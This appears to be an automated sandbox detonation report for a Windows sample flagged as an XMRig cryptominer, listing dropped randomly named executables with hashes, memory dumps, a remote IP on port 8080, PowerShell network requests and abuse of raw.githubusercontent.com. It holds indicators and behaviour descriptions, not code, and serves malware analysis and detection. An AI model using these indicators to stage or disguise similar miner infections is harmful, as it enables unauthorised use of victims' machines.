C:\Windows\System\gYeqUWF.exe

C:\Windows\System\gYeqUWF.exe

C:\Windows\System\WDqfOrU.exe

C:\Windows\System\WDqfOrU.exe

C:\Windows\System\xNyTrYR.exe

C:\Windows\System\xNyTrYR.exe

C:\Windows\System\afwjOAI.exe

C:\Windows\System\afwjOAI.exe

C:\Windows\System\sSVaMAS.exe

C:\Windows\System\sSVaMAS.exe

C:\Windows\System\PpIVOXz.exe

C:\Windows\System\PpIVOXz.exe

C:\Windows\System\tZZSROQ.exe

C:\Windows\System\tZZSROQ.exe

C:\Windows\System\NeXCZqy.exe

C:\Windows\System\NeXCZqy.exe

C:\Windows\System\brWlMUW.exe

C:\Windows\System\brWlMUW.exe

C:\Windows\System\gTqBEjX.exe

C:\Windows\System\gTqBEjX.exe

C:\Windows\System\MCzUwtY.exe

C:\Windows\System\MCzUwtY.exe

C:\Windows\System\vpljrIJ.exe

C:\Windows\System\vpljrIJ.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/1540-0-0x000000013FA60000-0x000000013FE52000-memory.dmp

memory/1540-1-0x00000000000F0000-0x0000000000100000-memory.dmp

C:\Windows\system\bksPibP.exe

MD5 b7062819a13e1a4969acab83862a12a7
SHA1 0686eabfe168ada32ec523e4639d2156675440c7
SHA256 dd6613d52b2461a7021798fe352f16b078ba28ea8d9ebd0bedb4385f2e0a0479
SHA512 c2686c4cc2d933cae48a747430aef262dfc0f7465e8ea168741398b3ce8a11189e23e10d867f938cf8df57903bff4658b7376c9526c7953f10cd245eb86d1319

\Windows\system\sOaBmhh.exe

MD5 fd7acf55813e606796289ed114033c4a
SHA1 a1d820c817230d45f3c98025b133cc34fce75e1c
SHA256 c4c5a352eddf192001aa008c0128bf25defa2ee9999d3963731cb951635fb83d
SHA512 81cda7d80cfb9eeaa27069f94994ef863daf92823dd7dbd1665be649de2351c41c6670ddf9f82cf5f854a01b8bb09addb628a761dbf8cd257329c0931fe2a2f9

memory/2496-14-0x000007FEF603E000-0x000007FEF603F000-memory.dmp

memory/2612-13-0x000000013FB60000-0x000000013FF52000-memory.dmp

memory/1540-12-0x0000000002C60000-0x0000000003052000-memory.dmp

memory/2496-18-0x000000001B160000-0x000000001B442000-memory.dmp

C:\Windows\system\LDSfORn.exe

MD5 175a3cbb4a5f9ff6602187bdc5a08920
SHA1 a2e2f9e960c448f890bbc2a6317e5f7a07ad4cbe
SHA256 450559b5c293e224c1957d86c85daf5af2f298325b388990e098f69a91eb1f7b
SHA512 61ee44ff71f38f42f940a6f25c2c109f324911925fd3eca3d0a1f851742b3504a876cbefca786c68f3e9654fd90111876a12e4b4996f9ee573e411da261d478e

memory/2496-24-0x0000000002510000-0x0000000002518000-memory.dmp

\Windows\system\lYBDLYz.exe

MD5 d1c31a332219cb5e99293e80e331fde3
SHA1 f0ca9343f7c1f05f065fd907e155f1c1c4aa48ad
SHA256 0e7e46b041d6c28d7f6b79b2bedd66bcb5e7b672ed1e1a783a2a8164546dc495
SHA512 8be749637cd22cbd6d98c3b5643af06055ce3139620cb61b0ecc70740e0252417e3e28545ad34be75a6e0ad07e8013b6276f65b81cd03a1ef8ea4d462bb2fc2d

C:\Windows\system\ldMzEqP.exe

MD5 ba27887089a7c7a44762c77719210968
SHA1 f41404534f3b27fa467bfb014acc3021f17b4c2d
SHA256 7cffb8d120ae14156370f26fc87624238fac8ad27e2217ec71f2a4828e9b2bf2
SHA512 e45b6e064dc2c42b5426eb45cdf1bd5ba5741c1ec296b62fca8857a00481fec1e6ca7876e1ad15a4e2ace717a27d08b3d8bd890bdd9a793a0119d8e1f9ba56f7

\Windows\system\jbgOyTK.exe

MD5 87400df01d53413bdae73b9cef57dfbd
SHA1 e91484618cb3a6b1f730b0bc4adf481e09df9e03
SHA256 59fff53cc90b5d325c59fbaf9c3d232b00423becdf38a0c8875a749d647d7341
SHA512 4d44e690663d4f9a8a2d05b5813eaed51d46ed991390f2a4c655da28f1506620a556757438ca0146319d518fdd6b50669e74aadd1c3ee91e4dd2d343542ea512

C:\Windows\system\WVrYPUv.exe

MD5 d4bb1fd02b0c518049bf0a38699acc13
SHA1 8253757c4a5f9d265c95898654af8b4cae9a887b
SHA256 74ac88440fef55a435e7bb84ba12133a832a1ac8470bc989f6de9d8cf2a6fd46
SHA512 b859b9aff4560ae75afcb5d2e2abd9913c2ef50a3277c81b8cf40a79b44c799f9a59ef4bc5372549bf82a62fab6e6e57b370d3f99071f5f4437889ebe227678b

C:\Windows\system\klciSum.exe

MD5 3b62ffaa6ab2311b0eb896ad16a46645
SHA1 0ebee5d89321f1aefa210af5b5f132bc33ef6109
SHA256 95d5cfc906de4510b045ca01af0d164ff598c6cac7d097a4666db778e5d16403
SHA512 2e62b2e0efea31babde097aa298fbf4d59036d5429384aeaa8b5c3af311f9118f17c8dcd4bf2f2db6b52dc3a08b8aeda78a761ea089e95ee104db0be5f968933

memory/2876-81-0x000000013F730000-0x000000013FB22000-memory.dmp

C:\Windows\system\EfjXvrd.exe

MD5 f9d8d3369589bd07c49cf66d58a87937
SHA1 f2e452e11a970e8978a362ac3bcdcc07cfae3077
SHA256 423f73dd21a7488e8ae6f108b2c8a73a4be5463f2d71887fecf2b36218ccc03e
SHA512 8fc7417d0d1fb5dd414ec625e6cf750cd2a8d2f71610dab24e80919c07502251965c43dbba3ce9643776bf7c07386cd55f9845decd0f48f38e4404a44d41873b

\Windows\system\YYJcFTD.exe

MD5 4205c657047c39febb2a8eb3e11ad040
SHA1 786440ff74b0db69b432fe8b53a80e8218c9072b
SHA256 49fe7ca6d5ef81793bda4c15180827f5c23faf5130c2626245a3107bba659c61
SHA512 67b0f1708ac6c693b71b8a7e629f38f172da42c20641676836832c53c428ceb3b2493c0b79e635167d6243915746e528a3193c5ea57a2bc7f7b7d52436ed7215

\Windows\system\ovQpKfw.exe

MD5 be7e849d239df85bbe97133f2397695e
SHA1 1312267e992d1c961d7dd95562a0a5cf88da838e
SHA256 74efc660e373382b32dc457fc506c1caf14b3ccaf9348f0d033c89e47317efb4
SHA512 8f09e565e8136d21e633a0db0ddb1a98976f56b5bb7dda282fab3cc0bf56eae6098bbf1fcb588af1f2b2ea55e04623c3c6836a86079dd1740f8e2edde95f5983

C:\Windows\system\kAlSEYI.exe

MD5 bd928674038f4fb8c2a93364fd2faca0
SHA1 47307be625dcc86394af2e79953c66420f98a19d
SHA256 f0d4c0f7679d12ef31ce1532ae8dd32dbefdb05d0f2c612467100a638e041d18
SHA512 b09ea7864fa3e62acefcce5b7acb74ccdb156e689cfc73e4244294f784f69c06ac7f43f3442c548456060f81e4672deff25fa46dff146a18b833580c5c87ab34

memory/1540-133-0x000000013F1B0000-0x000000013F5A2000-memory.dmp

memory/2496-166-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

memory/1540-132-0x000000013F550000-0x000000013F942000-memory.dmp

memory/2856-131-0x000000013FFC0000-0x00000001403B2000-memory.dmp

memory/1540-130-0x000000013FFC0000-0x00000001403B2000-memory.dmp

C:\Windows\system\tqYpyyt.exe

MD5 6b814612d7f50146ff17dfb5c41f28b7
SHA1 dcdbb024f051befe7dad18b01f0f56c5765d3224
SHA256 9e04ffa1ebbfba738bc015cfe737daafc3be779f43926ebf2ca7738800bad796
SHA512 cc12f0ce485ed1431c23d97d8be35c6d17c2027182ee35d365fc8269c9f4225747d4ad131badde72b3a7ef761c60a8ef30134efa2240f764db6a2d94e3c305ff

\Windows\system\JRyJdAb.exe

MD5 7637291eac1473adad311675576f2150
SHA1 aa6da151d2189081d730f8908cc405959442aa10
SHA256 199aa270cbfbd182fd164ecc3958734ef28e773c4ecc1dc90b2cb5e60aa47601
SHA512 0e3854e2ba1d6d42e9a62539d7d7e95a5fefd72f1f93a23e2184b925d435243ac80543d30f384d306c593347a603fa6ec351eb65d271316ff05395c72b8c7791

C:\Windows\system\FrYSWat.exe

MD5 b185c1975aed1c0469a0b13876c618b8
SHA1 f12bb5f4ececc5ff7d480dde86121e23798a01b5
SHA256 eaeabced1302636e61c87222855cd00d78ccc9877175d20b731d9818a0980012
SHA512 8c1ca13e0536db82c7754d221afbe861276175a1a1926e6dbd5562e48d43ed36c2be9083971653bcca58d3ab8636b52a2a305fafdf2f4742fd5957c8a0a19948

\Windows\system\GNpQeCZ.exe

MD5 97d6e2a38847122e676078e05afeeedf
SHA1 9a9bada7a5fe679982acd8beff587f36f245b405
SHA256 5011146a8506d382f5e19503d353d44e29d9525b6d8678efc807907aff882352
SHA512 2c61d339dca47bd788b5954f7e0899b9df264d3369387f4d9afdb9c90248f3f7b87f51f12d9981a5566eedc9c41465df74aa8f26295a8a1a5e233c7033d770de

\Windows\system\YETLTUm.exe

MD5 f5bb249df4e14a2258b309331993a0cb
SHA1 bdc3ea6cd41ebb3701f0f47ba039416cdb7a8a9e
SHA256 1a7691ef33f40a4fd9af59de172d644d5aa49513ac42da03ed65713481624f59
SHA512 6cd1ccf3bd99be25f98b38860bbec69c5bea6aa41f7e612b447d64535566f9b5a9245c192c6a9d50ac73480f02f7484f82670991584307a7ebdc3a877bf20738

\Windows\system\tPdArdM.exe

MD5 cb372ff757f223e171a98a8ae951067b
SHA1 3db6f0e663f5eeb95ffe4e106c92404c1bdd09c3
SHA256 782f1e1d47c55e009462f66c6c3abed007e3ef9fb7e4ad5203db3877be39c1a1
SHA512 3adbf5a2e56e5023d05780d9626365526b69f3d500f144be74a49eb0669e6406291785732a0e9e216ec8408139f95801d0ba63353a8d0517a359ffa64ebfef0f

C:\Windows\system\kzPiPMf.exe

MD5 fe40d6cfd38212d468073b4158789bc1
SHA1 6a4de1e20575b63892323c54e775f728bd727ec1
SHA256 4c66250dc063aaab6bb50e7dc793432b5d7caea99afc3e1343db10ab044d08d0
SHA512 083329f877bbb4a64ccbbda0fdbc4a31bb5d9014563d744baf518a593ae8c0cc1c530b65f09cf80e7d674ff7b761225663664e64d12769dfa829c82a00bca82c

memory/1540-167-0x000000013FA60000-0x000000013FE52000-memory.dmp

\Windows\system\YAZtCAP.exe

MD5 4ba62997d07a34519b579c5d558440c9
SHA1 bc470f1079d50b1010723b374c9459f28c39b8cb
SHA256 cabe9fe30e3b2833d08c524a883005e501e7726cb893219e3cfcfc753df24f7a
SHA512 754fd415685817405e6cc06e9ed1a63bb9b3093e4a7f9d8c42d60e6e13712ca1f9be0cfea3c819098489f0e97529d2664faaa35a0a4daabd0cd49d299a99549c

memory/2252-386-0x000000013F600000-0x000000013F9F2000-memory.dmp

memory/1376-377-0x000000013FBC0000-0x000000013FFB2000-memory.dmp

memory/2104-376-0x000000013F410000-0x000000013F802000-memory.dmp

memory/2500-375-0x000000013F1B0000-0x000000013F5A2000-memory.dmp

memory/3060-374-0x000000013F550000-0x000000013F942000-memory.dmp

\Windows\system\DycljJS.exe

MD5 f4d7925c711fa0667388022ac7a19bc4
SHA1 d1db721171dd02279d71e8644aae5ea9967529ae
SHA256 f570c9475c0669c97c08a68a79c653ee391a84e6e30dc44fbb4a2a3211bf7794
SHA512 8c0699bad9869c8c1f2c92082448bfa8e1fae70d766af1a177587067204e981e26a08985ddf6082bfe06fb47d09acb3cbcc28a8c2d8fac2ec7a4ffb0cc8ec2ba

C:\Windows\system\RfcxqqY.exe

MD5 357ff2e0a8a7f072f2313e22028f8bf5
SHA1 16ddb7efb1554dff9be073607681a71b2c030507
SHA256 5b6f3ea7c81511dccd405ea22cbf4d4aed9a72eca565bc6eea0883dc721beaad
SHA512 92ccb41cf40fef9cb576712aa237254b7006ac39f78ab3c8a865bfcc406d82136244cf19c8a1a2b0548e19a368d2b3166688f8a26ea0c9103b10bda871048395

\Windows\system\wPTZWWJ.exe

MD5 52528168020e990861f6497f729491cd
SHA1 43593b18d948a317822f97bdac2fcec5ec5df1a6
SHA256 6f8b65122d4c23f4906844129702b7b7678a8d5a001d751f19f58d99e26f9ed2
SHA512 f9d0bb5e3319a72603d8bcdbc041f98992875501cf276f8a6afc2f1745d552851658bffa74b3b818fcc8dfe55c92fd6152866ac65b153584bf03501a27803676

\Windows\system\BEOTsRk.exe

MD5 7a00098e8e9c6f2d104f0ab4d73518d2
SHA1 1a4b37c35cf5b20b16beb4a72da2352ea407364b
SHA256 129ffe700c4fb3ed9f61d462fbc46ac35d9ff2a56700a13c3a0ce34cb5027b32
SHA512 375834e79140b1a321ab5a94c80c4a54078a411957f2775d366d850dadb0b72b96082d7839df014c7d76f454d0ef917234b9ca15301238cb6cb8739b87166886

C:\Windows\system\jNerXEI.exe

MD5 8980bc879b3df41a90ff8a256cbc31aa
SHA1 c5d1ba4e9a64f323ca2debf6111c97e5fc29b246
SHA256 0cad17a139951a9eff0181eea5768ff19957af09ef15813b936401de7108ab76
SHA512 935ab0bd6c6ab85ac4d3a8963e9902975a0ea84cab5f5b78d1e27a63c2c60dc7115451dcb85c6c72ee423c3790bcb9835d8b8284c6148d81305074fb10d2ca1c

memory/2540-169-0x000000013FC30000-0x0000000140022000-memory.dmp

\Windows\system\kicfqqD.exe

MD5 dd34aea137d06db14b9d402aaef96941
SHA1 8c0a3e0a555538c5d150d240a3e85ff2ad59d914
SHA256 790e4009ca8b7cc3ac06e11eac52c489063ac7733eb0f47a167a0d4163ea48e4
SHA512 e82abcf0d39e3948cfd838b0d170b89087f63b27db81092e3802cc3becc055ae7fd92542848250707d4114b334e5e6326cae2e2a656d02e881140487122517f9

C:\Windows\system\AnTVHxw.exe

MD5 4c424bae61aab8a9e9b24b566e772657
SHA1 211f335f1abdda1931bf2179f987e7673165ff38
SHA256 abdcaef83537dc2f089558f6a9eacc16c72a1ec04d5e6a0231b3063a6bc592ce
SHA512 07a249cca18be1577d96ddf5c4586c6e7c993e6f211debb8d62a2cca19d31703a73e1d49c0142f078137f27aad08c169e28db2d2d56bd12164d78fb81a3a3942

memory/2468-80-0x000000013F680000-0x000000013FA72000-memory.dmp

memory/2520-79-0x000000013F1C0000-0x000000013F5B2000-memory.dmp

C:\Windows\system\hfQCXQu.exe

MD5 f757963675d6c18b305fb4c32dce9ba4
SHA1 1de3e8c470eb6fe35b95570321808cd2c1ae8151
SHA256 93cec62f1ded8c2665d81fd49506aba5a058f31001971181c2a7ddc7eb711e6d
SHA512 afbfa5edfff825f3d57e445adbed63987d61e9bc6b6a2496ac141e8f89997198cdbf576462b4d6648d3fe3da01cd6d77608cbffcea521b1bef2954138b03d72b

C:\Windows\system\mjiQpnp.exe

MD5 3642e9fd8f85677b7fd3dcd59188ba40
SHA1 917726a40c0f86f52c7090b25227cdf6aa4b9013
SHA256 c0c938953c8c643b49c7cc133ec22650967e0bdc9d485829bfa75c33bd787e27
SHA512 270b11f5694388b183be0f17ceab8b441835f7e4a1a1bd7a264bf29bde0f38dd6e465e451cbf02a6373d11940d38ced943a38e85fa473f6cbcd6b42ae8c15d86

C:\Windows\system\noehAjo.exe

MD5 6738d4a36d2492804fce8bba355ac155
SHA1 86e565f1b73a5dc282446f491936b650aabc9863
SHA256 db743cbf501b5a9120cd5968ef3a7e2dcf552665ac0466f1b7ab1aa78f6a0a75
SHA512 0d58f9bf099dd8e1582bfbfec2da5fd26efea693a958d4f07749034e1e435a0d1af9ec69f6d2c15db616e18fb1939b172a3c98f9983f681f558876b47bf81328

C:\Windows\system\kBXQCHX.exe

MD5 a10db8041d9924505771ccf2318cc058
SHA1 1d1a9df1d7c028360234dad5dfc346c222d43d25
SHA256 5c58154184fa55f6995e327c82bed8130e550d55ab2ce3a761d392c6fcaaea49
SHA512 57c4f849f9779acb4e1ca95b400ca55632336d03f8478454ef401eaebdfec5ed961743ff9181a4bda7fde990363369303da77eac74c1261119fcfe20ba64759b

C:\Windows\system\nrQzQhy.exe

MD5 447c495a56f8173f14959eb64e59ee90
SHA1 29a265ef59d169c3babc0e837d7e262e57ccf698
SHA256 6442c4a7aaa009429374e47760485ba4c2c5fc378e1cea79e8a8d9adaf82eea2
SHA512 c00aa65899ee8f996f2f9476499f1c0735b7a6ae2ffbb2ea329771a5516e1b7f6c7dc7cf9fde842418c5329f4878ace9b9e53e69164bca800bd76b569af50867

C:\Windows\system\MtgIQZd.exe

MD5 8fa8d4a14f9fd4be7028637d7aba6c4b
SHA1 2eaa43aed8330d9628c05aa32a9c8d9c9f676dd7
SHA256 e988e7bc5ede1fff9531cd40e497d255d55c13a267e7bbf253b7bcee8c4d4a96
SHA512 6e6acbb11f05e32e59e831aaeace89f35907103337eaf7795cb1ce6b3632dfeece4cf52a765fd2d334f8ed5e3adc5b61aa03b48312ba9a455d530c5b112a5d03

memory/1540-71-0x0000000003250000-0x0000000003642000-memory.dmp

memory/1540-70-0x000000013F1C0000-0x000000013F5B2000-memory.dmp

memory/1540-69-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2836-68-0x000000013F150000-0x000000013F542000-memory.dmp

memory/1540-67-0x0000000003250000-0x0000000003642000-memory.dmp

memory/1540-66-0x000000013F150000-0x000000013F542000-memory.dmp

memory/2416-65-0x000000013F120000-0x000000013F512000-memory.dmp

memory/2576-64-0x000000013F7B0000-0x000000013FBA2000-memory.dmp

memory/2720-62-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

memory/1540-61-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2752-60-0x000000013FBF0000-0x000000013FFE2000-memory.dmp

memory/1540-59-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2540-58-0x000000013FC30000-0x0000000140022000-memory.dmp

memory/2496-57-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

C:\Windows\system\TnWlnjs.exe

MD5 5b3e156b00cc64bf10b3248bbb00f635
SHA1 fea5a63782f71cf1d70c9867fbb290988e0ae62c
SHA256 6abc4d8ff4b04dae8702c9b051ca3c7181b3fa71ccbb4c1c3aa17fd42e3db2c7
SHA512 06802e033d77f6c1f3e25f554a54772589580ba6e840ed7e412f96eb61037ed10120e1e3da66d5c000d8a75f441cfb13ccac8a6e236cc0336e6066eea51a8d79

memory/2496-36-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

memory/1540-63-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2496-34-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

memory/2836-1693-0x000000013F150000-0x000000013F542000-memory.dmp

memory/2540-1685-0x000000013FC30000-0x0000000140022000-memory.dmp

memory/2576-1747-0x000000013F7B0000-0x000000013FBA2000-memory.dmp

memory/2520-1733-0x000000013F1C0000-0x000000013F5B2000-memory.dmp

memory/2468-1716-0x000000013F680000-0x000000013FA72000-memory.dmp

memory/2876-1702-0x000000013F730000-0x000000013FB22000-memory.dmp

memory/2752-1701-0x000000013FBF0000-0x000000013FFE2000-memory.dmp

memory/2720-1678-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

memory/2612-1675-0x000000013FB60000-0x000000013FF52000-memory.dmp

memory/2416-1824-0x000000013F120000-0x000000013F512000-memory.dmp

memory/2856-1830-0x000000013FFC0000-0x00000001403B2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 16:29

Reported

2024-05-22 16:32

Platform

win10v2004-20240226-en

Max time kernel

154s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\oybcRdh.exe N/A
N/A N/A C:\Windows\System\bCnfYEa.exe N/A
N/A N/A C:\Windows\System\aCkRthi.exe N/A
N/A N/A C:\Windows\System\Aldckeh.exe N/A
N/A N/A C:\Windows\System\wTJDOwB.exe N/A
N/A N/A C:\Windows\System\oeAqIfl.exe N/A
N/A N/A C:\Windows\System\odHQYrI.exe N/A
N/A N/A C:\Windows\System\VJaUJdC.exe N/A
N/A N/A C:\Windows\System\weCsJgR.exe N/A
N/A N/A C:\Windows\System\LseLwVD.exe N/A
N/A N/A C:\Windows\System\ecKWWfP.exe N/A
N/A N/A C:\Windows\System\vgGRBeA.exe N/A
N/A N/A C:\Windows\System\gPyGIbO.exe N/A
N/A N/A C:\Windows\System\ZuqZTuE.exe N/A
N/A N/A C:\Windows\System\VxBsifi.exe N/A
N/A N/A C:\Windows\System\PcyaNwe.exe N/A
N/A N/A C:\Windows\System\wkkltIF.exe N/A
N/A N/A C:\Windows\System\QadEqRo.exe N/A
N/A N/A C:\Windows\System\iUVRMkw.exe N/A
N/A N/A C:\Windows\System\DXIWExJ.exe N/A
N/A N/A C:\Windows\System\KzCJJsD.exe N/A
N/A N/A C:\Windows\System\yqRRvbT.exe N/A
N/A N/A C:\Windows\System\EniCXZH.exe N/A
N/A N/A C:\Windows\System\ZtHcSzY.exe N/A
N/A N/A C:\Windows\System\tGsGqBS.exe N/A
N/A N/A C:\Windows\System\YuOsXig.exe N/A
N/A N/A C:\Windows\System\kIHPGMB.exe N/A
N/A N/A C:\Windows\System\FXjgfTE.exe N/A
N/A N/A C:\Windows\System\jDpdvJi.exe N/A
N/A N/A C:\Windows\System\GZwBlKE.exe N/A
N/A N/A C:\Windows\System\pWmWOHY.exe N/A
N/A N/A C:\Windows\System\dWLbWOP.exe N/A
N/A N/A C:\Windows\System\lQgyAad.exe N/A
N/A N/A C:\Windows\System\vBVfuCN.exe N/A
N/A N/A C:\Windows\System\VQrrpah.exe N/A
N/A N/A C:\Windows\System\pqCjfaO.exe N/A
N/A N/A C:\Windows\System\LcmobQW.exe N/A
N/A N/A C:\Windows\System\UmLskmS.exe N/A
N/A N/A C:\Windows\System\jHQight.exe N/A
N/A N/A C:\Windows\System\vCNwUBB.exe N/A
N/A N/A C:\Windows\System\uHKWOMn.exe N/A
N/A N/A C:\Windows\System\kWFMyBC.exe N/A
N/A N/A C:\Windows\System\KaljWmd.exe N/A
N/A N/A C:\Windows\System\NaVioqg.exe N/A
N/A N/A C:\Windows\System\tzfpSPG.exe N/A
N/A N/A C:\Windows\System\ExLvawr.exe N/A
N/A N/A C:\Windows\System\bIUkKSK.exe N/A
N/A N/A C:\Windows\System\MVtmpaE.exe N/A
N/A N/A C:\Windows\System\ptcUtgu.exe N/A
N/A N/A C:\Windows\System\wgKTULn.exe N/A
N/A N/A C:\Windows\System\qCnbaAp.exe N/A
N/A N/A C:\Windows\System\xZOHIpW.exe N/A
N/A N/A C:\Windows\System\PGjqLJJ.exe N/A
N/A N/A C:\Windows\System\bkLktOC.exe N/A
N/A N/A C:\Windows\System\pWIWGWk.exe N/A
N/A N/A C:\Windows\System\fNYKFBD.exe N/A
N/A N/A C:\Windows\System\YVgHUDm.exe N/A
N/A N/A C:\Windows\System\KaAdOLk.exe N/A
N/A N/A C:\Windows\System\BMAybon.exe N/A
N/A N/A C:\Windows\System\zPisPxP.exe N/A
N/A N/A C:\Windows\System\cDMOBQa.exe N/A
N/A N/A C:\Windows\System\QVLpjvn.exe N/A
N/A N/A C:\Windows\System\XhBveRS.exe N/A
N/A N/A C:\Windows\System\cXBAXvb.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\wfDDjWb.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\naXOSJX.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\UblRgCx.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\LaNmLbv.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\QuZRhYE.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\kmnHPVU.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\irgyrXO.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\mEleiGD.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\wXVvsRr.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\ElpdcYO.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\AOtmeks.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\WZhzPSk.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\nmGixeo.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\LseLwVD.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\xsVDAsj.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\pBkvHbO.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\wwIOzzv.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\uoAYAsG.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\yzUrQac.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\nksuetR.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
